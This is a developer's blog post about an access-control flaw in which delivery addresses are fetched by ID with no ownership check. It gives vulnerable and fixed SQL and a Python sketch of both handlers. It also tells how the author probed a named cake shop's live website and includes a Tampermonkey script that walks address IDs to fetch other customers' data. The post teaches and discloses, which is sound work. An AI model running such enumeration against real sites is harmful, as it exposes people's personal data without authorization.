Last year the company took on a large project in Nanshan. Because there was no closely comparable project to reference, everything had to be worked out by trial and error: build a version, find that it did not feel right, revise it, and then develop the new features on top. Nobody was free to come and help at the time, so it was a real headache. To make the work more convenient I camped out at the client's office, developing and discussing solutions with them, and came home at midnight every day. Because new functions were being developed, the old layout was also being adjusted, and on top of that there were bugs to fix. The workload was too much for one person, while the client demanded fast progress, so many details were neglected, and that also left hidden security risks. The work lasted about three months, and finally the development was finished. I was very happy that a project was finally done. But right at that point the customer brought in a professional tester to look specifically for system vulnerabilities, and that is where the root of the trouble appeared: seven or eight vulnerabilities were found, including in online payment and customer information security.

For example, here is how customer information was insecure.

The SQL used when querying a user's address information:

```sql
-- T-SQL; @addressId is the address ID taken from the request URL
SELECT TOP 1 * FROM addr WHERE id = @addressId
```

Under normal circumstances this is no problem: the user's address ID is unique. But if a user simply changes the ID in the GET request on the website, they may retrieve another customer's address, which is a serious disclosure of other customers' information.

For example, if the address is fetched with GET /user/deliveryAddress/55, the user can instead request /user/deliveryAddress/56.

The correct approach is to take the user ID from the current logged-in session and add it to the query, so that the address must belong to that user:

```sql
-- @userId comes from the server-side session, never from the request
SELECT TOP 1 * FROM addr WHERE id = @addressId AND userid = @userId

This makes sure the address returned belongs to the current user.
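As an added example (not code from the original post), the following Python sketch shows the request handler in both forms: the vulnerable lookup by address ID alone, and the fixed lookup scoped to the session user. It uses an in-memory SQLite table with constructed rows in place of the real addr table, so T-SQL's SELECT TOP 1 is spelled LIMIT 1; the route path and column names are assumptions.

```python
import sqlite3
from typing import Optional

# Constructed sample data standing in for the page's "addr" table.
CONSTRUCTED_ROWS = [
    (55, 1, "1 Example Road"),   # address 55 belongs to user 1
    (56, 2, "2 Example Road"),   # address 56 belongs to user 2
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE addr (id INTEGER PRIMARY KEY, userid INTEGER, street TEXT)")
    conn.executemany("INSERT INTO addr VALUES (?, ?, ?)", CONSTRUCTED_ROWS)
    return conn


def get_address_vulnerable(conn, address_id: int) -> Optional[tuple]:
    # Looks up by the URL parameter only: whoever is logged in gets any row.
    return conn.execute(
        "SELECT id, userid, street FROM addr WHERE id = ? LIMIT 1", (address_id,)
    ).fetchone()


def get_address_fixed(conn, address_id: int, session_user_id: int) -> Optional[tuple]:
    # Scopes the row to the logged-in user. Someone else's address is
    # indistinguishable from a non-existent one, so nothing leaks.
    return conn.execute(
        "SELECT id, userid, street FROM addr WHERE id = ? AND userid = ? LIMIT 1",
        (address_id, session_user_id),
    ).fetchone()


def handle_request(conn, path: str, session_user_id: int, fixed: bool = True):
    """Simulates GET /user/deliveryAddress/<id>; returns (status, body)."""
    prefix = "/user/deliveryAddress/"
    if not path.startswith(prefix) or not path[len(prefix):].isdigit():
        return 400, None
    address_id = int(path[len(prefix):])
    row = (get_address_fixed(conn, address_id, session_user_id) if fixed
           else get_address_vulnerable(conn, address_id))
    if row is None:
        return 404, None
    return 200, {"id": row[0], "userid": row[1], "street": row[2]}
```

With the fix, user 1 asking for address 56 gets a 404 instead of user 2's street.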

Is it just me? It's not.

A few days ago it came out that a certain cake shop's cakes were not made fresh the same day and that its internal management was a mess. I had bought a cake from them before, so out of curiosity I went to their official website to have a look. By accident I found that when a user edits their address information, the site fetches it in exactly the same way I had done before: /user/deliveryAddress/ID.

As someone in IT who had made this mistake before, I was curious and changed an address ID at random. As expected, the address information changed and I saw another user's details. Later, to verify it, I wrote a loop in Tampermonkey:

```javascript
// ==UserScript==
// @name         XFXB
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        https://www.xfxb.net/*
// @require      http://code.jquery.com/jquery-1.11.0.min.js
// @grant        none
// ==/UserScript==

(function() {
    'use strict';
    for (var i = 1000; i < 1005; i++) {
        $.get("/user/deliveryAddress/" + i, function(result) {
            console.log(result);
        });
    }
})();
```

The following information appeared:

It is easy to get at other users' addresses, and it seems other developers are making the same mistake.

To the IT team of that cake website: your bug needs to be fixed.

I am recording these pitfalls in the hope that others step in fewer of them; the solutions are here on CNBLOGS.